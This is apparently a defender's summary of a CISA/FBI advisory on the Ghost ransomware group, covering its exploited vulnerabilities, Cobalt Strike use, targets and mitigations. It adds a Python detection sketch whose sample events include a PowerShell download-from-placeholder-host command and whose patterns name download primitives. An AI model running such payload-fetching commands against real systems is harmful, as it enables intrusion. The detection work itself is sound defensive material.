Full Report
CISA and the FBI have released a joint advisory detailing the activity of the China-based Ghost ransomware group.
Analysis Summary
# Threat Actor: Ghost Ransomware Group
## Attribution & Identity
* **Primary Affiliation:** Threat actor group originating from China.
* **Known Aliases:** Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.
* **Attribution Source:** Joint advisory issued by the FBI, CISA, and MS-ISAC.
## Activity Summary
The group runs a long-running, financially motivated ransomware campaign that has compromised victim organizations in over 70 countries. It operates quickly, often progressing from initial compromise to ransomware deployment within the same day, so it has little need for durable persistence. While the group claims that exfiltrated data will be leaked if the ransom is unpaid, observed activity suggests it infrequently exfiltrates significant amounts of sensitive data (intellectual property or PII).
## Tactics, Techniques & Procedures
* **Initial Access:** Exploiting known vulnerabilities in public-facing systems, including:
  * Fortinet FortiOS appliances
  * Adobe ColdFusion servers
  * Microsoft SharePoint
  * Microsoft Exchange
* **Execution & Staging:** Uploading a web shell to compromised servers.
* **Command and Control (C2) & Post-Exploitation:** Leveraging Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon malware for subsequent actions.
* **Defense Evasion:** Using Cobalt Strike to enumerate and disable anti-malware systems.
* **Lateral Movement & Privilege Escalation:** Using Cobalt Strike and various open-source tools.
* **Persistence:** Persistence is generally not a major focus; they typically spend only a few days on victim networks.
* **Impact:** Deployment of ransomware.
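The staging and post-exploitation steps above (web shell on a public-facing server, then Command Prompt or PowerShell fetching a second-stage payload) leave a characteristic parent/child pattern in process-creation telemetry. The following is an added detection sketch, not code from the advisory or from CISA/FBI tooling; the web-server process names, the download keywords and the sample events are assumptions and constructed data.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumption: worker process names of the web servers hosting the products
# named in the summary (IIS for SharePoint/Exchange, Adobe ColdFusion).
WEB_SERVER_PARENTS = {"w3wp.exe", "coldfusion.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Download primitives commonly seen when a shell pulls a second-stage payload.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient", re.I
)

@dataclass
class ProcEvent:
    host: str
    parent: str    # image name of the parent process
    image: str     # image name of the created process
    cmdline: str

def classify(ev: ProcEvent) -> Optional[str]:
    """Return 'high', 'medium' or None for one process-creation event."""
    from_web = ev.parent.lower() in WEB_SERVER_PARENTS
    is_shell = ev.image.lower() in SHELLS
    downloads = bool(DOWNLOAD_RE.search(ev.cmdline))
    if from_web and is_shell and downloads:
        return "high"      # web server -> shell -> download: the full chain
    if from_web and is_shell:
        return "medium"    # a web server spawning a shell is rarely legitimate
    return None            # ordinary admin or user activity

def detect(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (host, severity, image) for every event that needs analyst review."""
    return [(e.host, sev, e.image) for e in events if (sev := classify(e))]

# Constructed sample telemetry for illustration only; not real data.
SAMPLE = [
    ProcEvent("web01", "w3wp.exe", "cmd.exe",
              "cmd.exe /c powershell -c \"(New-Object Net.WebClient)"
              ".DownloadString('http://placeholder.invalid/stage')\""),
    ProcEvent("web01", "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("ws22", "explorer.exe", "powershell.exe",
              "powershell.exe -File C:\\Scripts\\backup.ps1"),
    ProcEvent("ws22", "services.exe", "powershell.exe",
              "powershell Invoke-WebRequest https://updates.example.invalid/"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE):
        print(hit)
```

A download from a non-web-server parent (the last sample event) is deliberately left unflagged here so the rule stays tied to the web-shell chain; broaden it only after baselining normal PowerShell download activity on the estate.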
## Targeting
* **Sectors:** Small and Medium Businesses (SMBs), critical infrastructure providers, schools/universities, healthcare organizations, government bodies, religious institutions, and technology/manufacturing companies.
* **Geography:** Global (victims reported in over 70 countries).
* **Victims:** Broad range of sectors, described as going after "low-hanging fruit." No specific organizational victims were named in the provided context.
## Tools & Infrastructure
* **Malware families used:** Ghost Ransomware, Cobalt Strike Beacon (extensively used for C2, privilege escalation, credential access, and lateral movement).
* **Infrastructure (C2, domains, IPs):** Not explicitly detailed in the summary aside from the use of Cobalt Strike for C2 communications.
## Implications
The consistent targeting of known vulnerabilities and a fast "smash-and-grab" approach suggests the group prioritizes volume over sophisticated, deep compromise. Their reliance on well-known tools like Cobalt Strike indicates pragmatic use of readily available offensive tradecraft, although their geographic origin (China) is noted as unusual for ransomware actors. They are deterred by strong baseline security, segmentation, and MFA.
## Mitigations
* Regularly back up and store backups separately from source systems.
* Patch known vulnerabilities in a timely, risk-based manner, specifically including: CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.
* Implement network segmentation to restrict lateral movement.
* Deploy phishing-resistant Multi-Factor Authentication (MFA) for all privileged and email services accounts.